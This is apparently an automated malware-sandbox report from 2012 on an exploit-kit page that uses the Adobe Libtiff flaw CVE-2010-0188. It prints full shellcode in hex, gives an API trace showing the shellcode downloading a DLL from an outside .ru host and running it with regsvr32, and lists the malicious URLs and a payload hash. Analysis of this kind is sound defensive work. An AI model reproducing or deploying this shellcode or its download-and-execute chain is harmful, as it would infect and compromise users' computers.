Analysis report for http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php

Sample Overview

URL http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php
Domaincnnvcnsaoljfrut.ru
Analysis Started 2012-03-09 06:23:07
Report Generated 2012-03-09 06:23:15
Jsand version 2.3.2

See the report for domain cnnvcnsaoljfrut.ru.

Detection results

DetectorResult
Jsand 2.3.2 malicious

In particular, the following URL was found to contain malicious content:

Exploits

NameDescriptionReference
Adobe LibtiffLibtiff integer overflow in Adobe Reader and AcrobatCVE-2010-0188

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL StatusContent Type
http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php 200text/html
http://cnnvcnsaoljfrut.ru:8080/images/hvincoylguat.swf 200application/x-shockwave-flash
about:blank 200text/html
http://cnnvcnsaoljfrut.ru:8080/images/apxmknanfveu.jar 200application/zip
http://cnnvcnsaoljfrut.ru:8080/images/amypdqdzcnkqd.jar 200application/zip
http://cnnvcnsaoljfrut.ru:8080/images/gthpcpxmgvjoe.php 200application/pdf

Redirects

No redirects.

ActiveX controls

Shellcode

HexadecimalASCII
4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a 
a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41 
26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 
12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41 
41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33 
c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33 
db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8 
8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51 
e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b 
76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be 
10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75 
e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54 
24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb 
53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68 
08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00 
00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50 
55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00 
68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff 
ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c 
c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7 
44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c 
8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d 
05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88 
44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14 
85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53 
ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa 
47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe 
ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca 
8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f 
2f 7a 6f 6c 69 6e 64 61  72 6b 6b 73 6f 6b 6e 73 
2e 72 75 3a 38 30 38 30  2f 69 6d 61 67 65 73 2f 
6a 77 2e 70 68 70 3f 69  3d 38 00 00 
L.`....J<.`..c.J
...J0..Jn/.JAAAA
&...............
.9.Jd.`.....AAAA
AAAAf......u4._3
.d.@0.@..p.V.v.3
.f.^<.t3,.......
.@0.F9.u..4$..uQ
..LQV.u<.t5x..V.
v...3.IA....3...
.8.t......@..;.u
.^.^$..f..K.F..T
$...........^Y..
S..h..}.3t.....h
...j.Y..........
..XPj@h....P...P
U...^......hon..
hurlmT........a.
.....r.......\$.
..$regs.D$.vr32.
D$..-s.Sh.....V.
..3.Q.D..wpbt.D.
..dll.D...Y...0.
D..AQj.j.SWj..V.
..u.j.S.V.j....S
.V........G.?.u.
G.?.u.j.j..V....
...N.......o..3.
.[..Fy6./phttp:/
/zolindarkksokns
.ru:8080/images/
jw.php?i=8..

This shellcode was found on http://cnnvcnsaoljfrut.ru:8080/images/gthpcpxmgvjoe.php.

Shellcode Analysis

Shellcode API Trace

OffsetDLL.API Name and argumentsReturn value
0x7c801ad9kernel32.VirtualProtect(lpAddress=0x402202, dwSize=255)1
0x7c801d7bkernel32.LoadLibraryA(lpFileName=urlmon)0x1a400000
0x7c835dfakernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbeurlmon.URLDownloadToFileA(pCaller=0, szURL=http://zolindarkksokns.ru:8080/images/jw.php?i=8, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)0
0x7c86250dkernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250dkernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3bkernel32.TerminateThread(dwExitCode=0)

Shellcode DLLs

DLL Name
kernel32.dll
urlmon.dll

Shellcode URLs

Complete URLDomain NameIP Address
http://zolindarkksokns.ru:8080/images/jw.php?i=8zolindarkksokns.ru:8080

Malware

Additional (potential) malware:

URLTypeHashAnalysis
http://zolindarkksokns.ru:8080/images/jw.php?i=8 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 2845d59896de45cc6e77cc39db4b0710
FEEDBACK

Comments